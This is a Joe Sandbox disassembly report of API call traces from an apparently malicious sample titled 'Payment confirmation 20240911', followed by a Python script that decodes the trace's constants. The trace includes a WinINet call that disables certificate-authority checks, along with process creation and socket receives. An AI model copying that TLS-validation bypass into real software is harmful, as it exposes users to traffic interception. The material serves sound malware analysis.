                                          • GetParent.USER32(?), ref: 0131C8B8
                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 0131C8BB
                                          Strings
                                          Similarity
                                          • API ID: MessageSend$CtrlParent$_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 313823418-1403004172
                                          • Opcode ID: 223145dbc19cef63b2df0c5569dc3e536661b347c176a91ae1beb9e4e2b3d8c5
                                          • Instruction ID: b108bead879932e8b865adc593db72bd3c9df11aa217037108aa0c76bd8258b6
                                          • Opcode Fuzzy Hash: 223145dbc19cef63b2df0c5569dc3e536661b347c176a91ae1beb9e4e2b3d8c5
                                          • Instruction Fuzzy Hash: 4921D075A00208BFDF04ABA4CC94EFEBBB8EF55314F404115F952E32A4DB789869DB20
                                          APIs
                                          • GetParent.USER32 ref: 0131C8D9
                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 0131C8EE
                                          • _wcscmp.LIBCMT ref: 0131C900
                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0131C97B
                                          Strings
                                          Similarity
                                          • API ID: ClassMessageNameParentSend_wcscmp
                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                          • API String ID: 1704125052-3381328864
                                          • Opcode ID: 54f37d8f2caa82fa44697953cde261d00fa799ff2449efa427809a81c5c11a9d
                                          • Instruction ID: 45e8275040e42607d9a1cdb808a525eedf74f8d6d881dc92f2b9205406b3f14c
                                          • Opcode Fuzzy Hash: 54f37d8f2caa82fa44697953cde261d00fa799ff2449efa427809a81c5c11a9d
                                          • Instruction Fuzzy Hash: 4A114C76288747B9FF1A2A39DC0ACA777DDDB0777CB100016F900A50DAFFA1A8114A50
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 0133B777
                                          • CoInitialize.OLE32(00000000), ref: 0133B7A4
                                          • CoUninitialize.OLE32 ref: 0133B7AE
                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 0133B8AE
                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 0133B9DB
                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0133BA0F
                                          • CoGetObject.OLE32(?,00000000,0136D91C,?), ref: 0133BA32
                                          • SetErrorMode.KERNEL32(00000000), ref: 0133BA45
                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0133BAC5
                                          • VariantClear.OLEAUT32(0136D91C), ref: 0133BAD5
                                          Similarity
                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                          • String ID:
                                          • API String ID: 2395222682-0
                                          • Opcode ID: 5f96142a4c95d43796f092b95936d510c23f9470a9b2b9a3e58b8c729465c980
                                          • Instruction ID: d387fe2a2c6e6aa48e031d5e2400b420be146a218a24ec6991c4e74a77e25c2a
                                          • Opcode Fuzzy Hash: 5f96142a4c95d43796f092b95936d510c23f9470a9b2b9a3e58b8c729465c980
                                          • Instruction Fuzzy Hash: E0C11171608345AFD700DFA8C88492ABBE9FF88348F00491DF98A9B255DB71E906CB52
                                          APIs
                                          • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0132B137
                                          Similarity
                                          • API ID: ArraySafeVartype
                                          • String ID:
                                          • API String ID: 1725837607-0
                                          • Opcode ID: ada128f8c1995f03c5140bcea5073e041a1eb4e3228ef7940b12f0d32a2684e0
                                          • Instruction ID: ae87d0b7a495e9a16c3a21f4c22cff40daeeca1af5f0fd78e5ad35f166176d5f
                                          • Opcode Fuzzy Hash: ada128f8c1995f03c5140bcea5073e041a1eb4e3228ef7940b12f0d32a2684e0
                                          • Instruction Fuzzy Hash: 5BC18375A0022ADFDB15DF98D480BBEBBF4FF09319F24406AEA55E7254C734A981CB90
                                          APIs
                                          • __swprintf.LIBCMT ref: 01327226
                                          • __swprintf.LIBCMT ref: 01327233
                                            • Part of subcall function 0130234B: __woutput_l.LIBCMT ref: 013023A4
                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 0132725D
                                          • LoadResource.KERNEL32(?,00000000), ref: 01327269
                                          • LockResource.KERNEL32(00000000), ref: 01327276
                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 01327296
                                          • LoadResource.KERNEL32(?,00000000), ref: 013272A8
                                          • SizeofResource.KERNEL32(?,00000000), ref: 013272B7
                                          • LockResource.KERNEL32(?), ref: 013272C3
                                          • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 01327322
                                          Similarity
                                          • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                          • String ID:
                                          • API String ID: 1433390588-0
                                          • Opcode ID: e25b258cd1eb143179634205cf0ef4ddbf67d4bbbfd9068aa4417977ab3033a2
                                          • Instruction ID: 3702f9115cfd8f5157798b85d9301fc196266a8c08e00c56ee8f5d7f320682b7
                                          • Opcode Fuzzy Hash: e25b258cd1eb143179634205cf0ef4ddbf67d4bbbfd9068aa4417977ab3033a2
                                          • Instruction Fuzzy Hash: 9A31A171A0026AABDB11AFA5DC89AAF7FACFF09354F048425FE41D2150E734D911CBB0
                                          APIs
                                          • GetCurrentThreadId.KERNEL32(?,?,?,?,?,01323AD7,?,00000001), ref: 01324A7D
                                          • GetForegroundWindow.USER32 ref: 01324A91
                                          • GetWindowThreadProcessId.USER32(00000000), ref: 01324A98
                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 01324AA7
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 01324AB9
                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 01324AD2
                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 01324AE4
                                          • AttachThreadInput.USER32(00000000,00000000), ref: 01324B29
                                          • AttachThreadInput.USER32(?,?,00000000), ref: 01324B3E
                                          • AttachThreadInput.USER32(00000000,?,00000000), ref: 01324B49
                                          Similarity
                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                          • String ID:
                                          • API String ID: 2156557900-0
                                          • Opcode ID: d41181137d29c2841cd3628c5590ada1a145d2c377c4ebfd790ea2a924ad4a08
                                          • Instruction ID: 5322b4e56e4a5a9f82d3d65df86e91ceae52224f59e28b201f1a036e1587ccd6
                                          • Opcode Fuzzy Hash: d41181137d29c2841cd3628c5590ada1a145d2c377c4ebfd790ea2a924ad4a08
                                          • Instruction Fuzzy Hash: 9331A076600214BFEB31AF58E888F6ABBADFB44369F548015FA49D7194D7F4DC408BA0
                                          APIs
                                          • GetClientRect.USER32(?), ref: 0135EC32
                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 0135EC49
                                          • GetWindowDC.USER32(?), ref: 0135EC55
                                          • GetPixel.GDI32(00000000,?,?), ref: 0135EC64
                                          • ReleaseDC.USER32(?,00000000), ref: 0135EC76
                                          • GetSysColor.USER32(00000005), ref: 0135EC94
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                          • String ID:
                                          • API String ID: 272304278-0
                                          • Opcode ID: e74486ed257726200cf9b50730de1540bdbbaab7a8a403afdfaa5fecb0ada5e0
                                          • Instruction ID: 03e5d79356b6035d5fd735d58732b4a84a0ff91b7fdf4e8481ab7051b2fe1159
                                          • Opcode Fuzzy Hash: e74486ed257726200cf9b50730de1540bdbbaab7a8a403afdfaa5fecb0ada5e0
                                          • Instruction Fuzzy Hash: 7D218E31200205EFDB619BA4EC48FA97B79EB04725F408164FB66A50E6DB714A40DF11
                                          APIs
                                           Memory Dump Source
                                           • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ChildEnumWindows
                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                          • API String ID: 3555792229-1603158881
                                          • Opcode ID: 2d4edc752a6dbbd94492c4982c78e7051af5815b41f4718997618f408a0c049a
                                          • Instruction ID: 71c8c6b628d51aad2d6b3e3bcf0b9f0c40cc3cfe583c46053add3532acd5a6f5
                                          • Opcode Fuzzy Hash: 2d4edc752a6dbbd94492c4982c78e7051af5815b41f4718997618f408a0c049a
                                          • Instruction Fuzzy Hash: 2B91B535A00507AADF0CDFE8C488BEEFBB5BF16318F448519C95AA7154DF306559CB90
                                          APIs
                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 012E45F0
                                          • CoUninitialize.OLE32 ref: 012E4695
                                          • UnregisterHotKey.USER32(?), ref: 012E47BD
                                          • DestroyWindow.USER32 ref: 01355936
                                          • FreeLibrary.KERNEL32(?), ref: 0135599D
                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 013559CA
                                           Memory Dump Source
                                           • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                          • String ID: close all
                                          • API String ID: 469580280-3243417748
                                          • Opcode ID: 7e6c901b9433bebc1a218b8dd65001319bede7058fa4bdf50b3789e36fad9123
                                          • Instruction ID: 4f4dbe145fb6eb22e1a54d0963440aaf4a94734a9d04e15a2b917c52c5da0e8c
                                          • Opcode Fuzzy Hash: 7e6c901b9433bebc1a218b8dd65001319bede7058fa4bdf50b3789e36fad9123
                                          • Instruction Fuzzy Hash: 61912C34620202CFC719EF58C898E68F7F8FF15715F9542A9E50AA7261DB30AD66CF50
                                          APIs
                                          • SetWindowLongW.USER32(?,000000EB,?,?,000000FF,?,000000FF), ref: 012FC2D2
                                            • Part of subcall function 012FC697: GetClientRect.USER32(?,?), ref: 012FC6C0
                                            • Part of subcall function 012FC697: GetWindowRect.USER32(?,?), ref: 012FC701
                                            • Part of subcall function 012FC697: ScreenToClient.USER32(?,?), ref: 012FC729
                                          • GetDC.USER32 ref: 0135E006
                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0135E019
                                          • SelectObject.GDI32(00000000,00000000), ref: 0135E027
                                          • SelectObject.GDI32(00000000,00000000), ref: 0135E03C
                                          • ReleaseDC.USER32(?,00000000), ref: 0135E044
                                          • MoveWindow.USER32(?,?,?,?,?,?), ref: 0135E0CF
                                           Memory Dump Source
                                           • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                          • String ID: U
                                          • API String ID: 4009187628-3372436214
                                          • Opcode ID: 568befffb75a959665b59c62d8e8b0c4c40a852190d4133fac01f191f14cc32a
                                          • Instruction ID: e4361d7f90582948150538eb480436c6bb35f4b50c5e7106dc56bf66cf797a2e
                                          • Opcode Fuzzy Hash: 568befffb75a959665b59c62d8e8b0c4c40a852190d4133fac01f191f14cc32a
                                          • Instruction Fuzzy Hash: 0D710235500209DFDF618FA8C880EEABFB9FF48368F044279EE555B2A6C7318955CB50
                                          APIs
                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 01334C5E
                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 01334C8A
                                           • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?,?,?,?,?,?,?,?,?,?), ref: 01334CCC (option 0x1F = INTERNET_OPTION_SECURITY_FLAGS)
                                           • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 01334CE1 (sets INTERNET_OPTION_SECURITY_FLAGS from a 4-byte buffer; a flag value of 0x100 = SECURITY_FLAG_IGNORE_UNKNOWN_CA makes WinINet accept a server certificate issued by an untrusted CA)
                                           • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01334CEE
                                           • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 01334D1E (info level 5 = HTTP_QUERY_CONTENT_LENGTH)
                                          • InternetCloseHandle.WININET(00000000), ref: 01334D65
                                            • Part of subcall function 013356A9: GetLastError.KERNEL32(?,?,01334A2B,00000000,00000000,00000001), ref: 013356BE
                                           Memory Dump Source
                                           • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                          • String ID:
                                          • API String ID: 1241431887-3916222277
                                          • Opcode ID: 805c8eb1e327fbc8610be3fc65d4b35615ee0178424b5b713c0eecd924019476
                                          • Instruction ID: ce5b604cf215db284c25fdbcc82d1c4525b0c5f7403b94b8656eb97dff046b0c
                                          • Opcode Fuzzy Hash: 805c8eb1e327fbc8610be3fc65d4b35615ee0178424b5b713c0eecd924019476
                                          • Instruction Fuzzy Hash: 344185B1600219BFEB129F94DC89FFB7BACFF48358F008116FA019A155D774D9448BA5
                                          APIs
                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 01348DF4
                                          • GetWindowLongW.USER32(00752260,000000F0), ref: 01348E27
                                          • GetWindowLongW.USER32(00752260,000000F0), ref: 01348E5C
                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 01348E8E
                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 01348EB8
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 01348EC9
                                          • SetWindowLongW.USER32(00000000,000000F0,00000000,?,?,?,0134C8FF,?,?,?,?,?), ref: 01348EE3
                                           Memory Dump Source
                                           • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: LongWindow$MessageSend
                                          • String ID: `"u
                                          • API String ID: 2178440468-810275233
                                          • Opcode ID: f52495fe7f17fc90bccc8635042eba9b9aeeaa9b1b953007593b0ccfc4ff9c63
                                          • Instruction ID: fdc999dc1ab101edf1af4f0064ed2b6bedb670777d00c92995080b764b9f3e5e
                                          • Opcode Fuzzy Hash: f52495fe7f17fc90bccc8635042eba9b9aeeaa9b1b953007593b0ccfc4ff9c63
                                          • Instruction Fuzzy Hash: 75313731200215EFDB32CF9CD884F553BE9FB4A768F5541A4F6498B2A6CB71B880DB41
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0137DBF0), ref: 0133BBA1
                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0137DBF0), ref: 0133BBD5
                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0133BD33
                                          • SysFreeString.OLEAUT32(?), ref: 0133BD5D
                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 0133BEAD
                                          • ProgIDFromCLSID.OLE32(?,?), ref: 0133BEF7
                                          • CoTaskMemFree.OLE32(?), ref: 0133BF14
                                           Memory Dump Source
                                           • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                          • String ID:
                                          • API String ID: 793797124-0
                                          • Opcode ID: f0b7614472a5c3060e8b606ea91b0aceb12a42b230d7b95fb40bd4db63372c46
                                          • Instruction ID: 3af7ee178295418496e890b0945e78db35a30ac87a81c489f11afe2207e0f981
                                          • Opcode Fuzzy Hash: f0b7614472a5c3060e8b606ea91b0aceb12a42b230d7b95fb40bd4db63372c46
                                          • Instruction Fuzzy Hash: 8DF11B75A00109EFCF14DFA8C888EAEB7B9FF89314F148559F905AB254DB31AE45CB90
                                          APIs
                                          • _memset.LIBCMT ref: 013423E6
                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 01342579
                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0134259D
                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 013425DD
                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 013425FF
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 01342760
                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 01342792
                                          • CloseHandle.KERNEL32(?), ref: 013427C1
                                          • CloseHandle.KERNEL32(?), ref: 01342838
                                           Memory Dump Source
                                           • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                          • String ID:
                                          • API String ID: 4090791747-0
                                          • Opcode ID: 6a734e91a743196e2cf70ed8d6d2d748c6701f1a8be478a2d78a30f4ec0930c6
                                          • Instruction ID: 9d59b3c3eb93127c0549d35bf3d7fc7d373a3bd8afa29f8e185a761c0abd2a79
                                          • Opcode Fuzzy Hash: 6a734e91a743196e2cf70ed8d6d2d748c6701f1a8be478a2d78a30f4ec0930c6
                                          • Instruction Fuzzy Hash: 48D1B031604302DFDB15EF28D494B6ABBE5EF84328F14845DF889AB2A1DB71EC41CB52
                                          APIs
                                          • select.WSOCK32 ref: 01339B38
                                          • WSAGetLastError.WSOCK32(00000000), ref: 01339B45
                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 01339B6F
                                           • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 01339B90 (ordinal 17 of wsock32.dll is recvfrom; the six arguments with a 0x10-byte address length match that signature)
                                          • WSAGetLastError.WSOCK32(00000000), ref: 01339B9F
                                          • htons.WSOCK32(?,?,?,00000000,?), ref: 01339C51
                                          • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0137DBF0), ref: 01339C0C
                                            • Part of subcall function 0131E0F5: _strlen.LIBCMT ref: 0131E0FF
                                            • Part of subcall function 0131E0F5: _memmove.LIBCMT ref: 0131E121
                                          • _strlen.LIBCMT ref: 01339CA7
                                          • _memmove.LIBCMT ref: 01339D10
                                           Memory Dump Source
                                           • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                           • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                                          • String ID:
                                          • API String ID: 3637404534-0
                                          • Opcode ID: 93949ce82d7c0592a930bf2c215812f3b3d9f20cc8916a3b4cb0a8fd65a6f253
                                          • Instruction ID: 4bcdc2c91d1ff9dfeab9a3f48661ba1881a7baf78e92fdf4fb2affeed4ff34e9
                                          • Opcode Fuzzy Hash: 93949ce82d7c0592a930bf2c215812f3b3d9f20cc8916a3b4cb0a8fd65a6f253
                                          • Instruction Fuzzy Hash: 2381DC31514242ABD710EF68CC58F6BBBE8EBD4718F50462DF6558B290DB71D904CB92
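The WinINet routine at 01334C5E, the CreateProcessW routine at 01342760 and the wsock32 routine at 01339B38 above are listed only as raw call sequences with hex arguments, so the security-relevant values (option 0x1F with flag 0x100, info level 5, ordinal #17, MEM_RELEASE) have to be decoded by hand. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it parses lines in the shape this listing uses (`function.Module(args), ref: address`, including the indented "Part of subcall function" lines), converts the hex arguments to integers and attaches the meaning of the documented Windows constants. The sample lines are copied from the report; the function names `parse_api_lines`, `annotate`, `analyze` and `findings` are this example's own, and the decoder assumes that for InternetSetOptionW the report prints the DWORD that the lpBuffer argument points to rather than the pointer itself.

```python
"""Decode argument constants in a Joe Sandbox "APIs" listing (added example)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: argument values copied from the report's WinINet,
# CreateProcessW, wsock32, VirtualFree and mciSendStringW listings.
SAMPLE_API_LINES = """\
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 01334C5E
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 01334C8A
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?,?,?,?,?,?,?,?,?,?), ref: 01334CCC
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 01334CE1
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01334CEE
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 01334D1E
  • Part of subcall function 013356A9: GetLastError.KERNEL32(?,?,01334A2B,00000000,00000000,00000001), ref: 013356BE
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 01342760
• select.WSOCK32 ref: 01339B38
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 01339B90
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 013559CA
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 012E45F0
"""

# Constants from wininet.h, winnt.h and the wsock32.dll export table.
INTERNET_OPTION_SECURITY_FLAGS = 31
HTTP_QUERY_CONTENT_LENGTH = 5
MEM_RELEASE = 0x8000
SECURITY_FLAGS = {
    0x00000080: "SECURITY_FLAG_IGNORE_REVOCATION",
    0x00000100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x00000200: "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    0x00001000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x00002000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
}
WSOCK32_ORDINALS = {16: "recv", 17: "recvfrom", 18: "select", 19: "send", 20: "sendto"}

# One report line: optional bullet, optional subcall prefix, name.MODULE, optional
# "(args)", then "ref: <hex address>". Headings and "Associated:" lines do not match.
_LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[^.(\s]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: list                  # int for a hex value, None for "?", str for a literal
    ref: str
    subcall_of: Optional[str] = None
    notes: List[str] = field(default_factory=list)


def _parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None                     # value not recovered by the analyzer
    if re.fullmatch(r"[0-9A-Fa-f]{1,8}", tok):
        return int(tok, 16)
    return tok                          # literal the report prints verbatim, e.g. "close all"


def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = _LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [_parse_arg(t) for t in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             m.group("ref"), m.group("sub")))
    return calls


def annotate(call: ApiCall) -> ApiCall:
    a = call.args
    if call.module == "WSOCK32" and call.name.startswith("#"):
        resolved = WSOCK32_ORDINALS.get(int(call.name[1:]))
        if resolved:
            call.notes.append(f"ordinal {call.name[1:]} = {resolved}")
    if (call.module == "WININET" and call.name.startswith("Internet")
            and call.name.endswith("OptionW") and len(a) > 1
            and a[1] == INTERNET_OPTION_SECURITY_FLAGS):
        call.notes.append("INTERNET_OPTION_SECURITY_FLAGS")
        # Assumption: the report shows the DWORD behind lpBuffer, not the pointer.
        if call.name == "InternetSetOptionW" and len(a) > 2 and isinstance(a[2], int):
            set_bits = [n for bit, n in SECURITY_FLAGS.items() if a[2] & bit]
            if set_bits:
                call.notes.append("weakens TLS validation: " + "|".join(set_bits))
    if call.name == "HttpQueryInfoW" and len(a) > 1 and a[1] == HTTP_QUERY_CONTENT_LENGTH:
        call.notes.append("HTTP_QUERY_CONTENT_LENGTH")
    if call.name == "VirtualFree" and len(a) > 2 and a[2] == MEM_RELEASE:
        call.notes.append("MEM_RELEASE")
    return call


def analyze(text: str) -> List[ApiCall]:
    return [annotate(c) for c in parse_api_lines(text)]


def findings(text: str) -> dict:
    """Map ref address -> decoded notes, only for calls that decoded to something."""
    return {c.ref: c.notes for c in analyze(text) if c.notes}


if __name__ == "__main__":
    for c in analyze(SAMPLE_API_LINES):
        print(f"{c.ref} {c.name}.{c.module}  {'; '.join(c.notes)}")
```

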